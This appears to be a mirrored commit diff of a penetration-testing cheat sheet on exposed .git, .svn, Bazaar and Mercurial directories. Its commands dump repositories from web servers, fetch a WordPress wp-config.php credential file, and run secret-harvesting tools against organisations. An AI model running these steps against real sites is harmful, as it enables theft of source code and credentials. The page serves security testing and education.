mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-23 21:05:27 +00:00
Clean up Insecure SCM page and add new tool yar
This commit is contained in:
parent
3a6ac550b8
commit
8c97cec6d8
@ -1,25 +1,35 @@
|
|||||||
# Insecure source code management
|
# Insecure source code management
|
||||||
|
|
||||||
- [GIT - Source code management](#git---source-code-management)
|
* [Git](#git)
|
||||||
- [Github example with a .git](#github-example-with-a-git)
|
+ [Example](#example)
|
||||||
- [Recovering the content of .git/index](#recovering-the-content-of-gitindex)
|
- [Recovering file contents from .git/logs/HEAD](#recovering-file-contents-from-git-logs-head)
|
||||||
- [Automatic way : diggit.py](#automatic-way--diggitpy)
|
- [Recovering file contents from .git/index](#recovering-file-contents-from-git-index)
|
||||||
- [Automatic way : GoGitDumper](#automatic-way-gogitdumper)
|
+ [Tools](#tools)
|
||||||
- [Automatic way : rip-git](#automatic-way--rip-git)
|
- [Automatic recovery](#automatic-recovery)
|
||||||
- [Automatic way : GitHack](#automatic-way--githack)
|
* [diggit.py](#diggitpy)
|
||||||
- [Harvesting secrets : trufflehog](#harvesting-secrets--trufflehog)
|
* [GoGitDumper](#gogitdumper)
|
||||||
- [Harvesting secrets : Gitrob](#harvesting-secrets--gitrob)
|
* [rip-git](#rip-git)
|
||||||
- [Harvesting secrets : Gitleaks](#harvesting-secrets--gitleaks)
|
* [GitHack](#githack)
|
||||||
- [SVN - Source code management](#svn---source-code-management)
|
* [GitTools](#gittools)
|
||||||
- [SVN example (Wordpress)](#svn-example-wordpress)
|
- [Harvesting secrets](#harvesting-secrets)
|
||||||
- [Automatic way : svn-extractor](#automatic-way--svn-extractor)
|
* [trufflehog](#trufflehog)
|
||||||
- [BAZAAR - Source code management](#bazaar---source-code-management)
|
* [Yar](#yar)
|
||||||
- [Automatic way : rip-bzr](#automatic-way--rip-bzr)
|
* [Gitrob](#gitrob)
|
||||||
- [Automatic way : bzr_dumper](#automatic-way--bzr_dumper)
|
* [Gitleaks](#gitleaks)
|
||||||
- [MERCURIAL - Source code management](#mercurial---source-code-management)
|
* [Subversion](#svn)
|
||||||
- [Automatic way : rip-hg](#automatic-way--rip-hg)
|
+ [Example (Wordpress)](#example--wordpress-)
|
||||||
|
+ [Tools](#tools-1)
|
||||||
|
- [svn-extractor](#svn-extractor)
|
||||||
|
* [Bazaar](#bazaar)
|
||||||
|
+ [Tools](#tools-2)
|
||||||
|
- [rip-bzr.pl](#rip-bzrpl)
|
||||||
|
- [bzr_dumper](#bzr-dumper)
|
||||||
|
* [Mercurial](#mercurial)
|
||||||
|
+ [Tools](#tools-3)
|
||||||
|
- [rip-hg.pl](#rip-hgpl)
|
||||||
|
* [References](#references)
|
||||||
|
|
||||||
## GIT - Source code management
|
## Git
|
||||||
|
|
||||||
The following examples will create either a copy of the .git or a copy of the current commit.
|
The following examples will create either a copy of the .git or a copy of the current commit.
|
||||||
|
|
||||||
@ -29,28 +39,32 @@ Check for the following files, if they exist you can extract the .git folder.
|
|||||||
- .git/HEAD
|
- .git/HEAD
|
||||||
- .git/logs/HEAD
|
- .git/logs/HEAD
|
||||||
|
|
||||||
### Github example with a .git
|
### Example
|
||||||
|
|
||||||
1. Check 403 error (Forbidden) for .git or even better : a directory listing
|
#### Recovering file contents from .git/logs/HEAD
|
||||||
2. Git saves all information in log file .git/logs/HEAD (try 'head' in lowercase too)
|
|
||||||
|
1. Check for 403 Forbidden or directory listing to find the `/.git/` directory
|
||||||
|
2. Git saves all information in `.git/logs/HEAD` (try lowercase `head` too)
|
||||||
```powershell
|
```powershell
|
||||||
0000000000000000000000000000000000000000 15ca375e54f056a576905b41a417b413c57df6eb root <root@dfc2eabdf236.(none)> 1455532500 +0000 clone: from https://github.com/fermayo/hello-world-lamp.git
|
0000000000000000000000000000000000000000 15ca375e54f056a576905b41a417b413c57df6eb root <root@dfc2eabdf236.(none)> 1455532500 +0000 clone: from https://github.com/fermayo/hello-world-lamp.git
|
||||||
15ca375e54f056a576905b41a417b413c57df6eb 26e35470d38c4d6815bc4426a862d5399f04865c Michael <michael@easyctf.com> 1489390329 +0000 commit: Initial.
|
15ca375e54f056a576905b41a417b413c57df6eb 26e35470d38c4d6815bc4426a862d5399f04865c Michael <michael@easyctf.com> 1489390329 +0000 commit: Initial.
|
||||||
26e35470d38c4d6815bc4426a862d5399f04865c 6b4131bb3b84e9446218359414d636bda782d097 Michael <michael@easyctf.com> 1489390330 +0000 commit: Whoops! Remove flag.
|
26e35470d38c4d6815bc4426a862d5399f04865c 6b4131bb3b84e9446218359414d636bda782d097 Michael <michael@easyctf.com> 1489390330 +0000 commit: Whoops! Remove flag.
|
||||||
6b4131bb3b84e9446218359414d636bda782d097 a48ee6d6ca840b9130fbaa73bbf55e9e730e4cfd Michael <michael@easyctf.com> 1489390332 +0000 commit: Prevent directory listing.
|
6b4131bb3b84e9446218359414d636bda782d097 a48ee6d6ca840b9130fbaa73bbf55e9e730e4cfd Michael <michael@easyctf.com> 1489390332 +0000 commit: Prevent directory listing.
|
||||||
```
|
```
|
||||||
3. Access to the commit based on the hash -> a directory name (first two signs from hash) and filename (rest of it).git/objects/26/e35470d38c4d6815bc4426a862d5399f04865c,
|
3. Access the commit using the hash
|
||||||
```powershell
|
```powershell
|
||||||
# create a .git directory
|
# create an empty .git repository
|
||||||
git init test
|
git init test
|
||||||
cd test/.git
|
cd test/.git
|
||||||
|
|
||||||
# download the file
|
# download the file
|
||||||
wget http://xxx.web.xxx.com/.git/objects/26/e35470d38c4d6815bc4426a862d5399f04865c
|
wget http://web.site/.git/objects/26/e35470d38c4d6815bc4426a862d5399f04865c
|
||||||
|
|
||||||
|
# first byte for subdirectory, remaining bytes for filename
|
||||||
mkdir .git/object/26
|
mkdir .git/object/26
|
||||||
mv e35470d38c4d6815bc4426a862d5399f04865c .git/objects/26/
|
mv e35470d38c4d6815bc4426a862d5399f04865c .git/objects/26/
|
||||||
|
|
||||||
# display the content of the file
|
# display the file
|
||||||
git cat-file -p 26e35470d38c4d6815bc4426a862d5399f04865c
|
git cat-file -p 26e35470d38c4d6815bc4426a862d5399f04865c
|
||||||
tree 323240a3983045cdc0dec2e88c1358e7998f2e39
|
tree 323240a3983045cdc0dec2e88c1358e7998f2e39
|
||||||
parent 15ca375e54f056a576905b41a417b413c57df6eb
|
parent 15ca375e54f056a576905b41a417b413c57df6eb
|
||||||
@ -60,7 +74,7 @@ Check for the following files, if they exist you can extract the .git folder.
|
|||||||
```
|
```
|
||||||
4. Access the tree 323240a3983045cdc0dec2e88c1358e7998f2e39
|
4. Access the tree 323240a3983045cdc0dec2e88c1358e7998f2e39
|
||||||
```powershell
|
```powershell
|
||||||
wget http://xxx.web.xxx.com/.git/objects/32/3240a3983045cdc0dec2e88c1358e7998f2e39
|
wget http://web.site/.git/objects/32/3240a3983045cdc0dec2e88c1358e7998f2e39
|
||||||
mkdir .git/object/32
|
mkdir .git/object/32
|
||||||
mv 3240a3983045cdc0dec2e88c1358e7998f2e39 .git/objects/32/
|
mv 3240a3983045cdc0dec2e88c1358e7998f2e39 .git/objects/32/
|
||||||
|
|
||||||
@ -73,22 +87,22 @@ Check for the following files, if they exist you can extract the .git folder.
|
|||||||
```
|
```
|
||||||
5. Read the data (flag.txt)
|
5. Read the data (flag.txt)
|
||||||
```powershell
|
```powershell
|
||||||
wget http://xxx.web.xxx.com/.git/objects/cb/6139863967a752f3402b3975e97a84d152fd8f
|
wget http://web.site/.git/objects/cb/6139863967a752f3402b3975e97a84d152fd8f
|
||||||
mkdir .git/object/cb
|
mkdir .git/object/cb
|
||||||
mv 6139863967a752f3402b3975e97a84d152fd8f .git/objects/32/
|
mv 6139863967a752f3402b3975e97a84d152fd8f .git/objects/32/
|
||||||
git cat-file -p cb6139863967a752f3402b3975e97a84d152fd8f
|
git cat-file -p cb6139863967a752f3402b3975e97a84d152fd8f
|
||||||
```
|
```
|
||||||
|
|
||||||
### Recovering the content of .git/index
|
#### Recovering file contents from .git/index
|
||||||
|
|
||||||
Use the git index file parser, using python3 https://pypi.python.org/pypi/gin
|
Use the git index file parser https://pypi.python.org/pypi/gin (python3).
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
pip3 install gin
|
pip3 install gin
|
||||||
gin ~/git-repo/.git/index
|
gin ~/git-repo/.git/index
|
||||||
```
|
```
|
||||||
|
|
||||||
Recover name and sha1 hash for each files listed in the index, allowing us to re-use the previous method on the file.
|
Recover name and sha1 hash of every file listed in the index, and use the same process above to recover the file.
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
$ gin .git/index | egrep -e "name|sha1"
|
$ gin .git/index | egrep -e "name|sha1"
|
||||||
@ -99,9 +113,11 @@ name = CRLF injection/README.md
|
|||||||
sha1 = d7ef4d77741c38b6d3806e0c6a57bf1090eec141
|
sha1 = d7ef4d77741c38b6d3806e0c6a57bf1090eec141
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### Tools
|
||||||
|
|
||||||
|
#### Automatic recovery
|
||||||
|
|
||||||
### Automatic way : diggit.py
|
##### diggit.py
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
./diggit.py -u remote_git_repo -t temp_folder -o object_hash [-r=True]
|
./diggit.py -u remote_git_repo -t temp_folder -o object_hash [-r=True]
|
||||||
@ -112,7 +128,7 @@ sha1 = d7ef4d77741c38b6d3806e0c6a57bf1090eec141
|
|||||||
-o is a hash of particular Git object to download
|
-o is a hash of particular Git object to download
|
||||||
```
|
```
|
||||||
|
|
||||||
### Automatic way : GoGitDumper
|
##### GoGitDumper
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
go get github.com/c-sto/gogitdumper
|
go get github.com/c-sto/gogitdumper
|
||||||
@ -121,11 +137,11 @@ git log
|
|||||||
git checkout
|
git checkout
|
||||||
```
|
```
|
||||||
|
|
||||||
### Automatic way : rip-git
|
##### rip-git
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
git clone https://github.com/kost/dvcs-ripper
|
git clone https://github.com/kost/dvcs-ripper
|
||||||
perl rip-git.pl -v -u "http://edge1.web.*****.com/.git/"
|
perl rip-git.pl -v -u "http://web.site/.git/"
|
||||||
|
|
||||||
git cat-file -p 07603070376d63d911f608120eb4b5489b507692
|
git cat-file -p 07603070376d63d911f608120eb4b5489b507692
|
||||||
tree 5dae937a49acc7c2668f5bcde2a9fd07fc382fe2
|
tree 5dae937a49acc7c2668f5bcde2a9fd07fc382fe2
|
||||||
@ -136,14 +152,14 @@ committer Michael <michael@easyctf.com> 1489389105 +0000
|
|||||||
git cat-file -p 5dae937a49acc7c2668f5bcde2a9fd07fc382fe2
|
git cat-file -p 5dae937a49acc7c2668f5bcde2a9fd07fc382fe2
|
||||||
```
|
```
|
||||||
|
|
||||||
### Automatic way : GitHack
|
##### GitHack
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
git clone https://github.com/lijiejie/GitHack
|
git clone https://github.com/lijiejie/GitHack
|
||||||
GitHack.py http://www.openssl.org/.git/
|
GitHack.py http://www.openssl.org/.git/
|
||||||
```
|
```
|
||||||
|
|
||||||
### Automatic way: GitTools
|
##### GitTools
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
git clone https://github.com/internetwache/GitTools
|
git clone https://github.com/internetwache/GitTools
|
||||||
@ -151,16 +167,27 @@ git clone https://github.com/internetwache/GitTools
|
|||||||
git checkout -- .
|
git checkout -- .
|
||||||
```
|
```
|
||||||
|
|
||||||
### Harvesting secrets : trufflehog
|
#### Harvesting secrets
|
||||||
|
|
||||||
> Searches through git repositories for high entropy strings and secrets, digging deep into commit history
|
##### trufflehog
|
||||||
|
|
||||||
|
> Searches through git repositories for high entropy strings and secrets, digging deep into commit history.
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
pip install truffleHog # https://github.com/dxa4481/truffleHog
|
pip install truffleHog # https://github.com/dxa4481/truffleHog
|
||||||
truffleHog --regex --entropy=False https://github.com/dxa4481/truffleHog.git
|
truffleHog --regex --entropy=False https://github.com/dxa4481/truffleHog.git
|
||||||
```
|
```
|
||||||
|
|
||||||
### Harvesting secrets : Gitrob
|
##### Yar
|
||||||
|
|
||||||
|
> Searches through users/organizations git repositories for secrets either by regex, entropy or both. Inspired by the infamous truffleHog.
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
go get github.com/nielsing/yar # https://github.com/nielsing/yar
|
||||||
|
yar -o orgname --both
|
||||||
|
```
|
||||||
|
|
||||||
|
##### Gitrob
|
||||||
|
|
||||||
> Gitrob is a tool to help find potentially sensitive files pushed to public repositories on Github. Gitrob will clone repositories belonging to a user or organization down to a configurable depth and iterate through the commit history and flag files that match signatures for potentially sensitive files.
|
> Gitrob is a tool to help find potentially sensitive files pushed to public repositories on Github. Gitrob will clone repositories belonging to a user or organization down to a configurable depth and iterate through the commit history and flag files that match signatures for potentially sensitive files.
|
||||||
|
|
||||||
@ -170,13 +197,13 @@ export GITROB_ACCESS_TOKEN=deadbeefdeadbeefdeadbeefdeadbeefdeadbeef
|
|||||||
gitrob [options] target [target2] ... [targetN]
|
gitrob [options] target [target2] ... [targetN]
|
||||||
```
|
```
|
||||||
|
|
||||||
### Harvesting secrets - Gitleaks
|
##### Gitleaks
|
||||||
|
|
||||||
> Gitleaks provides a way for you to find unencrypted secrets and other unwanted data types in git source code repositories.
|
> Gitleaks provides a way for you to find unencrypted secrets and other unwanted data types in git source code repositories.
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
# Run gitleaks against a public repository
|
# Run gitleaks against a public repository
|
||||||
docker run --rm --name=gitleaks zricethezav/gitleaks -v -r https://github.com/zricethezav/gitleaks.git
|
docker run --rm --name=gitleaks zricethezav/gitleaks -v -r https://github.com/zricethezav/gitleaks.git
|
||||||
|
|
||||||
# Run gitleaks against a local repository already cloned into /tmp/
|
# Run gitleaks against a local repository already cloned into /tmp/
|
||||||
docker run --rm --name=gitleaks -v /tmp/:/code/ zricethezav/gitleaks -v --repo-path=/code/gitleaks
|
docker run --rm --name=gitleaks -v /tmp/:/code/ zricethezav/gitleaks -v --repo-path=/code/gitleaks
|
||||||
@ -189,9 +216,9 @@ or
|
|||||||
go get -u github.com/zricethezav/gitleaks
|
go get -u github.com/zricethezav/gitleaks
|
||||||
```
|
```
|
||||||
|
|
||||||
## SVN - Source code management
|
## Subversion
|
||||||
|
|
||||||
### SVN example (Wordpress)
|
### Example (Wordpress)
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
curl http://blog.domain.com/.svn/text-base/wp-config.php.svn-base
|
curl http://blog.domain.com/.svn/text-base/wp-config.php.svn-base
|
||||||
@ -204,26 +231,30 @@ curl http://blog.domain.com/.svn/text-base/wp-config.php.svn-base
|
|||||||
2. Download interesting files
|
2. Download interesting files
|
||||||
* remove \$sha1\$ prefix
|
* remove \$sha1\$ prefix
|
||||||
* add .svn-base postfix
|
* add .svn-base postfix
|
||||||
* use first two signs from hash as folder name inside pristine/ directory (94 in this case)
|
* use first byte from hash as a subdirectory of the `pristine/` directory (`94` in this case)
|
||||||
* create complete path, which will be: `http://server/path_to_vulnerable_site/.svn/pristine/94/945a60e68acc693fcb74abadb588aac1a9135f62.svn-base`
|
* create complete path, which will be: `http://server/path_to_vulnerable_site/.svn/pristine/94/945a60e68acc693fcb74abadb588aac1a9135f62.svn-base`
|
||||||
|
|
||||||
### Automatic way : svn-extractor
|
### Tools
|
||||||
|
|
||||||
|
#### svn-extractor
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
git clone https://github.com/anantshri/svn-extractor.git
|
git clone https://github.com/anantshri/svn-extractor.git
|
||||||
python svn-extractor.py –url "url with .svn available"
|
python svn-extractor.py –url "url with .svn available"
|
||||||
```
|
```
|
||||||
|
|
||||||
## BAZAAR - Source code management
|
## Bazaar
|
||||||
|
|
||||||
### Automatic way : rip-bzr.pl
|
### Tools
|
||||||
|
|
||||||
|
#### rip-bzr.pl
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
wget https://raw.githubusercontent.com/kost/dvcs-ripper/master/rip-bzr.pl
|
wget https://raw.githubusercontent.com/kost/dvcs-ripper/master/rip-bzr.pl
|
||||||
docker run --rm -it -v /path/to/host/work:/work:rw k0st/alpine-dvcs-ripper rip-bzr.pl -v -u
|
docker run --rm -it -v /path/to/host/work:/work:rw k0st/alpine-dvcs-ripper rip-bzr.pl -v -u
|
||||||
```
|
```
|
||||||
|
|
||||||
### Automatic way : bzr_dumper
|
#### bzr_dumper
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
git clone https://github.com/SeahunOh/bzr_dumper
|
git clone https://github.com/SeahunOh/bzr_dumper
|
||||||
@ -248,9 +279,11 @@ $ bzr revert
|
|||||||
N static/
|
N static/
|
||||||
```
|
```
|
||||||
|
|
||||||
## MERCURIAL - Source code management
|
## Mercurial
|
||||||
|
|
||||||
### Automatic way : rip-hg.pl
|
### Tools
|
||||||
|
|
||||||
|
#### rip-hg.pl
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
wget https://raw.githubusercontent.com/kost/dvcs-ripper/master/rip-hg.pl
|
wget https://raw.githubusercontent.com/kost/dvcs-ripper/master/rip-hg.pl
|
||||||
|
Loading…
Reference in New Issue
Block a user